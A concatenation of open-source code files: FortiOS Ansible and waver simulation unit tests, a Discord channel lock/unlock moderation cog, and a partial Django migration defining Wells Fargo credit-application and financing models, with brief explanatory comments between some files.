        'echo-interval': '8',
        'fake-ap-log': '9',
        'ipsec-intf-cleanup': '10',
        'radio-stats-interval': '11',
        'rogue-ap-log': '12',
        'sta-capability-interval': '13',
        'sta-locate-timer': '14',
        'sta-stats-interval': '15',
        'vap-stats-interval': '16'
    }

    set_method_mock.assert_called_with('wireless-controller', 'timers', data=expected_data, vdom='root')
    schema_method_mock.assert_not_called()
    assert not is_error
    assert not changed
    assert response['status'] == 'error'
    assert response['http_status'] == 404
def test_wireless_controller_timers_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'wireless_controller_timers': {
'random_attribute_not_valid': 'tag',
'ble_scan_report_intv': '3',
'client_idle_timeout': '4',
'darrp_day': 'sunday',
'darrp_optimize': '6',
'discovery_interval': '7',
'echo_interval': '8',
'fake_ap_log': '9',
'ipsec_intf_cleanup': '10',
'radio_stats_interval': '11',
'rogue_ap_log': '12',
'sta_capability_interval': '13',
'sta_locate_timer': '14',
'sta_stats_interval': '15',
'vap_stats_interval': '16'
},
'vdom': 'root'}
is_error, changed, response = fortios_wireless_controller_timers.fortios_wireless_controller(input_data, fos_instance)
expected_data = {
'ble-scan-report-intv': '3',
'client-idle-timeout': '4',
'darrp-day': 'sunday',
'darrp-optimize': '6',
'discovery-interval': '7',
'echo-interval': '8',
'fake-ap-log': '9',
'ipsec-intf-cleanup': '10',
'radio-stats-interval': '11',
'rogue-ap-log': '12',
'sta-capability-interval': '13',
'sta-locate-timer': '14',
'sta-stats-interval': '15',
'vap-stats-interval': '16'
}
set_method_mock.assert_called_with('wireless-controller', 'timers', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
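The tests above all assert the same translation step: module argument keys with underscores are sent to FortiOS as hyphenated keys (e.g. `sta_locate_timer` becomes `sta-locate-timer`), and unrecognized keys such as `random_attribute_not_valid` are dropped. A minimal sketch of that step, assuming a simple allow-list (the real module derives the list from its argument spec; `to_fortios_data` is an illustrative name, not part of the module):

```python
def to_fortios_data(params, allowed_keys):
    """Keep only recognized keys and rename underscores to hyphens."""
    return {key.replace('_', '-'): value
            for key, value in params.items()
            if key in allowed_keys}
```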
# File: waver/simulation/_tests/test_source.py (repo: neuromusic/waver, license: BSD-3-Clause)
import numpy as np
from waver.simulation._source import Source
def test_source():
"""Test instantiating a source object."""
location = (None, None)
shape = (2, 2)
spacing = 0.1
weight = np.ones((2, 2))
source = Source(location=location,
shape=shape,
spacing=spacing,
period=0.1,
phase=0,
ncycles=None)
assert np.all(source.weight == weight)
assert source.period == 0.1
assert source.phase == 0
assert source.ncycles is None
np.testing.assert_array_equal(source.weight, weight)
# Test keypoints from the first wave are on the sine curve
np.testing.assert_almost_equal(source.profile(0), 0)
np.testing.assert_almost_equal(source.profile(0.025), 1)
np.testing.assert_almost_equal(source.profile(0.05), 0)
np.testing.assert_almost_equal(source.profile(0.1), 0)
# Test keypoints from the 11th wave are on the sine curve
np.testing.assert_almost_equal(source.profile(1), 0)
np.testing.assert_almost_equal(source.profile(1.025), 1)
np.testing.assert_almost_equal(source.profile(1.05), 0)
np.testing.assert_almost_equal(source.profile(1.1), 0)
# Test full value is correct
np.testing.assert_almost_equal(source.value(0), 0 * weight)
np.testing.assert_almost_equal(source.value(0.025), weight)
def test_pulsed_source():
"""Test instantiating a source object."""
location = (None, None)
shape = (2, 2)
spacing = 0.1
weight = np.ones((2, 2))
source = Source(location=location,
shape=shape,
spacing=spacing,
period=0.1,
phase=0,
ncycles=5)
assert np.all(source.weight == weight)
assert source.period == 0.1
assert source.phase == 0
assert source.ncycles == 5
# Test keypoints from the first wave are on the sine curve
np.testing.assert_almost_equal(source.profile(0), 0)
np.testing.assert_almost_equal(source.profile(0.025), 1)
np.testing.assert_almost_equal(source.profile(0.05), 0)
np.testing.assert_almost_equal(source.profile(0.1), 0)
# Test keypoints from 11th wave are now zero
np.testing.assert_almost_equal(source.profile(1), 0)
np.testing.assert_almost_equal(source.profile(1.025), 0)
np.testing.assert_almost_equal(source.profile(1.05), 0)
np.testing.assert_almost_equal(source.profile(1.1), 0)
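The profile assertions in the two tests above imply a sine profile, sin(2πt/period), that a finite `ncycles` forces to zero once that many periods have elapsed. A dependency-free sketch of that expected behavior with phase fixed at 0, as in these tests (`ref_profile` is an illustrative helper, not the waver implementation):

```python
import math

def ref_profile(t, period=0.1, ncycles=None):
    """Sine profile; zero after a finite number of cycles has elapsed."""
    if ncycles is not None and t >= ncycles * period:
        return 0.0
    return math.sin(2 * math.pi * t / period)
```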
def test_spatial_source():
"""Test instantiating a source object."""
location = (0, None)
shape = (2, 2)
spacing = 0.1
weight = np.zeros((2, 2))
weight[0] = 1
source = Source(location=location,
shape=shape,
spacing=spacing,
period=0.1,
phase=0,
ncycles=None)
assert np.all(source.weight == weight)
assert source.period == 0.1
assert source.phase == 0
assert source.ncycles is None
# Test keypoints from the first wave are on the sine curve
np.testing.assert_almost_equal(source.profile(0), 0)
np.testing.assert_almost_equal(source.profile(0.025), 1)
# Test full value is correct
np.testing.assert_almost_equal(source.value(0), 0 * weight)
np.testing.assert_almost_equal(source.value(0.025), weight)

# File: Collection/Anubis/cogs/raid prevention.py (repo: Vexvain/Discord-Collection, license: MIT)
import discord
from discord.ext import commands
class RaidPrevention(commands.Cog):
def __init__(self, bot):
self.bot = bot
# add a member from an "anti-raid database"
@commands.command()
@commands.has_guild_permissions(administrator=True)
async def db_add_member(self, ctx, member: discord.Member, *, reason=None):
try:
embed = discord.Embed(
title="Member added",
description=f"{member.mention} has been added to the database.",
color=discord.Color.blue())
await ctx.send(embed=embed)
except Exception:
embed = discord.Embed(
title="Issue",
description=f"{member} is not currently on this server.",
color=discord.Color.orange())
await ctx.send(embed=embed)
# remove a member from an "anti-raid database"
@commands.command()
@commands.has_guild_permissions(administrator=True)
async def db_del_member(self, ctx, member: discord.Member, *, reason=None):
try:
embed = discord.Embed(
title="Member removed",
description=f"{member.mention} has been removed from the database.",
color=discord.Color.blue())
await ctx.send(embed=embed)
except Exception:
embed = discord.Embed(
title="Issue",
description=f"{member} is not currently on this server.",
color=discord.Color.orange())
await ctx.send(embed=embed)
# lock channel
@commands.command()
@commands.guild_only()
@commands.has_guild_permissions(manage_channels=True)
@commands.bot_has_guild_permissions(manage_channels=True)
async def lock(self, ctx, channel: discord.TextChannel = None):
channel = channel or ctx.channel
if ctx.guild.default_role not in channel.overwrites:
overwrites = {ctx.guild.default_role: discord.PermissionOverwrite(
send_messages=False)}
await channel.edit(overwrites=overwrites)
embed = discord.Embed(
title="Channel locked",
description=f"{channel.name} has been locked down.",
color=discord.Color.blue())
await ctx.send(embed=embed)
elif channel.overwrites[ctx.guild.default_role].send_messages or channel.overwrites[ctx.guild.default_role].send_messages is None:
overwrites = channel.overwrites[ctx.guild.default_role]
overwrites.send_messages = False
await channel.set_permissions(ctx.guild.default_role, overwrite=overwrites)
embed = discord.Embed(
title="Channel locked",
description=f"{channel.name} has been locked down.",
color=discord.Color.blue())
await ctx.send(embed=embed)
# unlock channel
@commands.command()
@commands.guild_only()
@commands.has_guild_permissions(manage_channels=True)
@commands.bot_has_guild_permissions(manage_channels=True)
async def unlock(self, ctx, channel: discord.TextChannel = None):
channel = channel or ctx.channel
if ctx.guild.default_role not in channel.overwrites:
overwrites = {
ctx.guild.default_role: discord.PermissionOverwrite(
send_messages=True)}
await channel.edit(overwrites=overwrites)
embed = discord.Embed(
title="Channel unlocked",
description=f"{channel.name} has been unlocked.",
color=discord.Color.blue())
await ctx.send(embed=embed)
elif channel.overwrites[ctx.guild.default_role].send_messages is None or channel.overwrites[ctx.guild.default_role].send_messages == False:
overwrites = channel.overwrites[ctx.guild.default_role]
overwrites.send_messages = True
await channel.set_permissions(ctx.guild.default_role, overwrite=overwrites)
embed = discord.Embed(
title="Channel unlocked",
description=f"{channel.name} has been unlocked.",
color=discord.Color.blue())
await ctx.send(embed=embed)
def setup(bot):
bot.add_cog(RaidPrevention(bot))
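# Both `lock` and `unlock` above branch on the same condition: the channel counts as
# unlocked when the default role has no overwrite entry, or its send_messages flag is
# True or None (inherited). That decision, sketched with plain dicts standing in for
# discord.py overwrite objects (`is_unlocked` is illustrative only):

```python
def is_unlocked(overwrites, default_role="@everyone"):
    """True when the default role may send messages, explicitly or by inheritance."""
    entry = overwrites.get(default_role)
    return entry is None or entry.get("send_messages") in (True, None)
```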
# File: src/wellsfargo/migrations/0001_squash_060.py (repo: thelabnyc/django-oscar-wfrs, license: 0BSD)
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-01 21:38
from __future__ import unicode_literals
from decimal import Decimal
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import localflavor.us.models
import wellsfargo.core.fields
import oscar.models.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("auth", "0006_require_contenttypes_0002"),
(
"offer",
"0006_bluelightabsolutediscountbenefit_bluelightcountcondition_bluelightcoveragecondition_bluelightfixedpr",
),
]
operations = [
migrations.CreateModel(
name="APICredentials",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"username",
models.CharField(max_length=200, verbose_name="WFRS API Username"),
),
(
"password",
models.CharField(max_length=200, verbose_name="WFRS API Password"),
),
(
"merchant_num",
models.CharField(
max_length=200, verbose_name="WFRS API Merchant Number"
),
),
(
"priority",
models.IntegerField(default=1, verbose_name="Priority Order"),
),
(
"user_group",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
to="auth.Group",
),
),
],
options={
"verbose_name": "API Credentials",
"verbose_name_plural": "API Credentials",
"ordering": ("-priority", "-id"),
},
),
migrations.CreateModel(
name="CACreditApp",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"region",
models.CharField(
choices=[("US", "United States"), ("CA", "Canada")],
default="US",
max_length=15,
verbose_name="Region",
),
),
(
"language",
models.CharField(
choices=[("E", "English"), ("F", "French")],
default="E",
max_length=1,
verbose_name="Language",
),
),
(
"app_type",
models.CharField(
choices=[("I", "Individual"), ("J", "Joint")],
default="I",
max_length=1,
verbose_name="Application Type",
),
),
(
"purchase_price",
models.IntegerField(
blank=True,
null=True,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(99999),
],
verbose_name="Requested Credit Amount",
),
),
(
"main_first_name",
models.CharField(max_length=15, verbose_name="First Name"),
),
(
"main_last_name",
models.CharField(max_length=20, verbose_name="Last Name"),
),
(
"main_middle_initial",
models.CharField(
blank=True,
max_length=1,
null=True,
verbose_name="Middle Initial",
),
),
(
"main_date_of_birth",
wellsfargo.core.fields.DateOfBirthField(
null=True, verbose_name="Date of Birth"
),
),
(
"main_address_line1",
models.CharField(max_length=35, verbose_name="Address Line 1"),
),
(
"main_address_line2",
models.CharField(
blank=True,
max_length=35,
null=True,
verbose_name="Address Line 2",
),
),
(
"main_address_city",
models.CharField(max_length=15, verbose_name="City"),
),
(
"main_home_value",
models.IntegerField(
blank=True,
null=True,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(9999999),
],
verbose_name="Home Value",
),
),
(
"main_mortgage_balance",
models.IntegerField(
blank=True,
null=True,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(9999999),
],
verbose_name="Mortgage Balance",
),
),
(
"main_annual_income",
models.IntegerField(
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(999999),
],
verbose_name="Annual Income",
),
),
(
"insurance",
models.BooleanField(
default=False, verbose_name="Optional Insurance"
),
),
(
"sales_person_id",
models.CharField(
blank=True,
max_length=4,
null=True,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
],
verbose_name="Existing Sales Person ID",
),
),
(
"new_sales_person",
models.CharField(
blank=True,
max_length=10,
null=True,
verbose_name="New Sales Person Name",
),
),
("email", models.EmailField(max_length=80, verbose_name="Email")),
("created_datetime", models.DateTimeField(auto_now_add=True)),
("modified_datetime", models.DateTimeField(auto_now=True)),
(
"main_ssn",
models.CharField(
max_length=50,
blank=True,
null=True,
verbose_name="Social Insurance Number",
),
),
(
"main_address_state",
models.CharField(max_length=2, verbose_name="Province"),
),
(
"main_address_postcode",
models.CharField(max_length=10, verbose_name="Postcode"),
),
(
"main_home_phone",
oscar.models.fields.PhoneNumberField(verbose_name="Home Phone"),
),
(
"main_time_at_address",
models.CharField(
max_length=4,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
django.core.validators.RegexValidator("^[0-9]{4}$"),
],
verbose_name="Time at Address",
),
),
(
"main_housing_status",
models.CharField(
choices=[("R", "Rent"), ("O", "Own")],
max_length=3,
verbose_name="Housing Status",
),
),
(
"main_employer_name",
models.CharField(max_length=30, verbose_name="Employer Name"),
),
(
"main_time_at_employer",
models.CharField(
max_length=4,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
django.core.validators.RegexValidator("^[0-9]{4}$"),
],
verbose_name="Time at Employer",
),
),
(
"main_employer_phone",
oscar.models.fields.PhoneNumberField(
verbose_name="Employer Phone Number"
),
),
(
"main_cell_phone",
oscar.models.fields.PhoneNumberField(
blank=True, null=True, verbose_name="Cell Phone"
),
),
(
"main_occupation",
models.CharField(max_length=24, verbose_name="Occupation"),
),
(
"main_photo_id_type",
models.CharField(
choices=[
("OA", "Old Age Security Card"),
("DL", "Driver’s License"),
("PI", "Provincial ID"),
("PA", "Canadian Passport"),
("CN", "Certificate of Citizenship or Naturalization"),
("IS", "Certificate of Indian Status"),
("CC", "Canadian Citizen Form 1000 or 1442"),
],
max_length=2,
verbose_name="Photo ID Type",
),
),
(
"main_photo_id_number",
models.CharField(
max_length=4,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
],
verbose_name="Photo ID Number",
),
),
(
"main_drivers_license_province",
models.CharField(
max_length=2,
blank=True,
null=True,
verbose_name="Driver’s License Province",
),
),
(
"main_photo_id_expiration",
models.DateField(verbose_name="Photo ID Expiration Date"),
),
(
"submitting_user",
models.ForeignKey(
blank=True,
help_text="Select the user who filled out and submitted the credit application (not always the same as the user who is applying for credit).",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Submitting User",
),
),
(
"user",
models.ForeignKey(
blank=True,
help_text="Select the user user who is applying and who will own (be the primary user of) this account.",
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="ca_individual_credit_apps",
to=settings.AUTH_USER_MODEL,
verbose_name="Owner",
),
),
(
"last4_account_number",
models.CharField(
blank=True,
max_length=4,
null=True,
verbose_name="Resulting Account",
),
),
],
options={
"verbose_name": "CA Individual Credit Application",
"verbose_name_plural": "CA Individual Credit Applications",
"abstract": False,
},
),
migrations.CreateModel(
name="CAJointCreditApp",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"region",
models.CharField(
choices=[("US", "United States"), ("CA", "Canada")],
default="US",
max_length=15,
verbose_name="Region",
),
),
(
"language",
models.CharField(
choices=[("E", "English"), ("F", "French")],
default="E",
max_length=1,
verbose_name="Language",
),
),
(
"app_type",
models.CharField(
choices=[("I", "Individual"), ("J", "Joint")],
default="I",
max_length=1,
verbose_name="Application Type",
),
),
(
"purchase_price",
models.IntegerField(
blank=True,
null=True,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(99999),
],
verbose_name="Requested Credit Amount",
),
),
(
"main_first_name",
models.CharField(max_length=15, verbose_name="First Name"),
),
(
"main_last_name",
models.CharField(max_length=20, verbose_name="Last Name"),
),
(
"main_middle_initial",
models.CharField(
blank=True,
max_length=1,
null=True,
verbose_name="Middle Initial",
),
),
(
"main_date_of_birth",
wellsfargo.core.fields.DateOfBirthField(
null=True, verbose_name="Date of Birth"
),
),
(
"main_address_line1",
models.CharField(max_length=35, verbose_name="Address Line 1"),
),
(
"main_address_line2",
models.CharField(
blank=True,
max_length=35,
null=True,
verbose_name="Address Line 2",
),
),
(
"main_address_city",
models.CharField(max_length=15, verbose_name="City"),
),
(
"main_home_value",
models.IntegerField(
blank=True,
null=True,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(9999999),
],
verbose_name="Home Value",
),
),
(
"main_mortgage_balance",
models.IntegerField(
blank=True,
null=True,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(9999999),
],
verbose_name="Mortgage Balance",
),
),
(
"main_annual_income",
models.IntegerField(
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(999999),
],
verbose_name="Annual Income",
),
),
(
"insurance",
models.BooleanField(
default=False, verbose_name="Optional Insurance"
),
),
(
"sales_person_id",
models.CharField(
blank=True,
max_length=4,
null=True,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
],
verbose_name="Existing Sales Person ID",
),
),
(
"new_sales_person",
models.CharField(
blank=True,
max_length=10,
null=True,
verbose_name="New Sales Person Name",
),
),
("email", models.EmailField(max_length=80, verbose_name="Email")),
("created_datetime", models.DateTimeField(auto_now_add=True)),
("modified_datetime", models.DateTimeField(auto_now=True)),
(
"joint_first_name",
models.CharField(max_length=15, verbose_name="First Name"),
),
(
"joint_last_name",
models.CharField(max_length=20, verbose_name="Last Name"),
),
(
"joint_middle_initial",
models.CharField(
blank=True,
max_length=1,
null=True,
verbose_name="Middle Initial",
),
),
(
"joint_date_of_birth",
wellsfargo.core.fields.DateOfBirthField(
null=True, verbose_name="Date of Birth"
),
),
(
"joint_address_line1",
models.CharField(max_length=35, verbose_name="Address Line 1"),
),
(
"joint_address_line2",
models.CharField(
blank=True,
max_length=35,
null=True,
verbose_name="Address Line 2",
),
),
(
"joint_address_city",
models.CharField(max_length=15, verbose_name="City"),
),
(
"joint_annual_income",
models.IntegerField(
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(999999),
],
verbose_name="Annual Income",
),
),
(
"main_ssn",
models.CharField(
max_length=50,
blank=True,
null=True,
verbose_name="Social Insurance Number",
),
),
(
"main_address_state",
models.CharField(max_length=2, verbose_name="Province"),
),
(
"main_address_postcode",
models.CharField(max_length=10, verbose_name="Postcode"),
),
(
"main_home_phone",
oscar.models.fields.PhoneNumberField(verbose_name="Home Phone"),
),
(
"main_time_at_address",
models.CharField(
max_length=4,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
django.core.validators.RegexValidator("^[0-9]{4}$"),
],
verbose_name="Time at Address",
),
),
(
"main_housing_status",
models.CharField(
choices=[("R", "Rent"), ("O", "Own")],
max_length=3,
verbose_name="Housing Status",
),
),
(
"main_employer_name",
models.CharField(max_length=30, verbose_name="Employer Name"),
),
(
"main_time_at_employer",
models.CharField(
max_length=4,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
django.core.validators.RegexValidator("^[0-9]{4}$"),
],
verbose_name="Time at Employer",
),
),
(
"main_employer_phone",
oscar.models.fields.PhoneNumberField(
verbose_name="Employer Phone Number"
),
),
(
"main_cell_phone",
oscar.models.fields.PhoneNumberField(
blank=True, null=True, verbose_name="Cell Phone"
),
),
(
"main_occupation",
models.CharField(max_length=24, verbose_name="Occupation"),
),
(
"main_photo_id_type",
models.CharField(
choices=[
("OA", "Old Age Security Card"),
("DL", "Driver’s License"),
("PI", "Provincial ID"),
("PA", "Canadian Passport"),
("CN", "Certificate of Citizenship or Naturalization"),
("IS", "Certificate of Indian Status"),
("CC", "Canadian Citizen Form 1000 or 1442"),
],
max_length=2,
verbose_name="Photo ID Type",
),
),
(
"main_photo_id_number",
models.CharField(
max_length=4,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
],
verbose_name="Photo ID Number",
),
),
(
"main_drivers_license_province",
models.CharField(
max_length=2,
blank=True,
null=True,
verbose_name="Driver’s License Province",
),
),
(
"main_photo_id_expiration",
models.DateField(verbose_name="Photo ID Expiration Date"),
),
(
"joint_ssn",
models.CharField(
max_length=50,
blank=True,
null=True,
verbose_name="Social Insurance Number",
),
),
(
"joint_address_state",
models.CharField(max_length=2, verbose_name="Province"),
),
(
"joint_address_postcode",
models.CharField(max_length=10, verbose_name="Postcode"),
),
(
"joint_employer_name",
models.CharField(max_length=30, verbose_name="Employer Name"),
),
(
"joint_time_at_employer",
models.CharField(
max_length=4,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
django.core.validators.RegexValidator("^[0-9]{4}$"),
],
verbose_name="Time at Employer",
),
),
(
"joint_employer_phone",
oscar.models.fields.PhoneNumberField(
verbose_name="Employer Phone Number"
),
),
(
"joint_cell_phone",
oscar.models.fields.PhoneNumberField(
blank=True, null=True, verbose_name="Cell Phone"
),
),
(
"joint_occupation",
models.CharField(max_length=24, verbose_name="Occupation"),
),
(
"joint_photo_id_type",
models.CharField(
choices=[
("OA", "Old Age Security Card"),
("DL", "Driver’s License"),
("PI", "Provincial ID"),
("PA", "Canadian Passport"),
("CN", "Certificate of Citizenship or Naturalization"),
("IS", "Certificate of Indian Status"),
("CC", "Canadian Citizen Form 1000 or 1442"),
],
max_length=3,
verbose_name="Photo ID Type",
),
),
(
"joint_photo_id_number",
models.CharField(
max_length=4,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
],
verbose_name="Photo ID Number",
),
),
(
"joint_drivers_license_province",
models.CharField(
max_length=2,
blank=True,
null=True,
verbose_name="Driver’s License Province",
),
),
(
"joint_photo_id_expiration",
models.DateField(verbose_name="Photo ID Expiration Date"),
),
(
"submitting_user",
models.ForeignKey(
blank=True,
help_text="Select the user who filled out and submitted the credit application (not always the same as the user who is applying for credit).",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Submitting User",
),
),
(
"user",
models.ForeignKey(
blank=True,
help_text="Select the user user who is applying and who will own (be the primary user of) this account.",
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="ca_joint_credit_apps",
to=settings.AUTH_USER_MODEL,
verbose_name="Owner",
),
),
(
"last4_account_number",
models.CharField(
blank=True,
max_length=4,
null=True,
verbose_name="Resulting Account",
),
),
],
options={
"verbose_name": "CA Joint Credit Application",
"verbose_name_plural": "CA Joint Credit Applications",
"abstract": False,
},
),
migrations.CreateModel(
name="FinancingPlan",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"plan_number",
models.PositiveIntegerField(
unique=True,
validators=[
django.core.validators.MinValueValidator(1001),
django.core.validators.MaxValueValidator(9999),
],
verbose_name="Plan Number",
),
),
(
"description",
models.TextField(
blank=True, default="", verbose_name="Description"
),
),
(
"apr",
models.DecimalField(
decimal_places=2,
default="0.00",
max_digits=5,
validators=[
django.core.validators.MinValueValidator(Decimal("0.00")),
django.core.validators.MaxValueValidator(Decimal("100.00")),
],
verbose_name="Annual percentage rate (0.0 – 100.0)",
),
),
(
"term_months",
models.PositiveSmallIntegerField(
default=12, verbose_name="Term Length (months)"
),
),
(
"is_default_plan",
models.BooleanField(default=False, verbose_name="Is Default Plan?"),
),
(
"allow_credit_application",
models.BooleanField(
default=True,
verbose_name="Allow new credit applications when user is eligible for this plan?",
),
),
],
options={
"ordering": ("plan_number",),
},
),
migrations.CreateModel(
name="FinancingPlanBenefit",
fields=[
(
"benefit_ptr",
models.OneToOneField(
auto_created=True,
on_delete=django.db.models.deletion.CASCADE,
parent_link=True,
primary_key=True,
serialize=False,
to="offer.Benefit",
),
),
("group_name", models.CharField(max_length=200, verbose_name="Name")),
("plans", models.ManyToManyField(to="wellsfargo.FinancingPlan")),
],
options={
"verbose_name": "Benefit",
"verbose_name_plural": "Benefits",
"abstract": False,
},
bases=("offer.benefit",),
),
migrations.CreateModel(
name="TransferMetadata",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"last4_account_number",
models.CharField(
max_length=4, verbose_name="Last 4 digits of account number"
),
),
("encrypted_account_number", models.BinaryField(null=True)),
("merchant_reference", models.CharField(max_length=128, null=True)),
("amount", models.DecimalField(decimal_places=2, max_digits=12)),
(
"type_code",
models.CharField(
choices=[
("5", "Authorization for Future Charge"),
("7", "Cancel Existing Authorization"),
("4", "Return or Credit"),
("9", "Time-out Reversal for Return or Credit"),
("VS", "Void Sale"),
("VR", "Void Return"),
],
max_length=2,
verbose_name="Transaction Type",
),
),
(
"ticket_number",
models.CharField(
blank=True,
max_length=12,
null=True,
verbose_name="Ticket Number",
),
),
(
"auth_number",
models.CharField(
blank=True,
default="000000",
max_length=6,
null=True,
verbose_name="Authorization Number",
),
),
(
"status",
models.CharField(
choices=[
(
"A0",
"Transaction not approved or declined. For time-out reversal and void transactions, match was found but was already funded.",
),
(
"A1",
"Approved. For time-out reversal and void transactions, match was found and processed.",
),
(
"A2",
"Time-out reversal or void approved, but no matching transaction was found.",
),
(
"A3",
"Time-out reversal or void approved, but matched duplicate transactions.",
),
],
max_length=2,
verbose_name="Status",
),
),
("message", models.TextField(verbose_name="Message")),
("disclosure", models.TextField(verbose_name="Disclosure")),
("created_datetime", models.DateTimeField(auto_now_add=True)),
("modified_datetime", models.DateTimeField(auto_now=True)),
(
"financing_plan",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
to="wellsfargo.FinancingPlan",
verbose_name="Plan Number",
),
),
(
"user",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="wfrs_transfers",
to=settings.AUTH_USER_MODEL,
verbose_name="Requesting User",
),
),
],
),
migrations.CreateModel(
name="USCreditApp",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"region",
models.CharField(
choices=[("US", "United States"), ("CA", "Canada")],
default="US",
max_length=15,
verbose_name="Region",
),
),
(
"language",
models.CharField(
choices=[("E", "English"), ("F", "French")],
default="E",
max_length=1,
verbose_name="Language",
),
),
(
"app_type",
models.CharField(
choices=[("I", "Individual"), ("J", "Joint")],
default="I",
max_length=1,
verbose_name="Application Type",
),
),
(
"purchase_price",
models.IntegerField(
blank=True,
null=True,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(99999),
],
verbose_name="Requested Credit Amount",
),
),
(
"main_first_name",
models.CharField(max_length=15, verbose_name="First Name"),
),
(
"main_last_name",
models.CharField(max_length=20, verbose_name="Last Name"),
),
(
"main_middle_initial",
models.CharField(
blank=True,
max_length=1,
null=True,
verbose_name="Middle Initial",
),
),
(
"main_date_of_birth",
wellsfargo.core.fields.DateOfBirthField(
null=True, verbose_name="Date of Birth"
),
),
(
"main_address_line1",
models.CharField(max_length=35, verbose_name="Address Line 1"),
),
(
"main_address_line2",
models.CharField(
blank=True,
max_length=35,
null=True,
verbose_name="Address Line 2",
),
),
(
"main_address_city",
models.CharField(max_length=15, verbose_name="City"),
),
(
"main_home_value",
models.IntegerField(
blank=True,
null=True,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(9999999),
],
verbose_name="Home Value",
),
),
(
"main_mortgage_balance",
models.IntegerField(
blank=True,
null=True,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(9999999),
],
verbose_name="Mortgage Balance",
),
),
(
"main_annual_income",
models.IntegerField(
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(999999),
],
verbose_name="Annual Income",
),
),
(
"insurance",
models.BooleanField(
default=False, verbose_name="Optional Insurance"
),
),
(
"sales_person_id",
models.CharField(
blank=True,
max_length=4,
null=True,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
],
verbose_name="Existing Sales Person ID",
),
),
(
"new_sales_person",
models.CharField(
blank=True,
max_length=10,
null=True,
verbose_name="New Sales Person Name",
),
),
("email", models.EmailField(max_length=80, verbose_name="Email")),
("created_datetime", models.DateTimeField(auto_now_add=True)),
("modified_datetime", models.DateTimeField(auto_now=True)),
(
"main_ssn",
wellsfargo.core.fields.USSocialSecurityNumberField(
max_length=11, verbose_name="Social Security Number"
),
),
(
"main_address_state",
localflavor.us.models.USStateField(
max_length=2, verbose_name="State"
),
),
(
"main_address_postcode",
localflavor.us.models.USZipCodeField(
max_length=10, verbose_name="Postcode"
),
),
(
"main_home_phone",
oscar.models.fields.PhoneNumberField(verbose_name="Home Phone"),
),
(
"main_time_at_address",
models.CharField(
blank=True,
max_length=4,
null=True,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
django.core.validators.RegexValidator("^[0-9]{4}$"),
],
verbose_name="Time at Address",
),
),
(
"main_housing_status",
models.CharField(
blank=True,
choices=[("R", "Rent"), ("O", "Own"), ("OT", "Other")],
max_length=3,
null=True,
verbose_name="Housing Status",
),
),
(
"main_employer_name",
models.CharField(
blank=True,
max_length=30,
null=True,
verbose_name="Employer Name",
),
),
(
"main_time_at_employer",
models.CharField(
blank=True,
max_length=4,
null=True,
validators=[
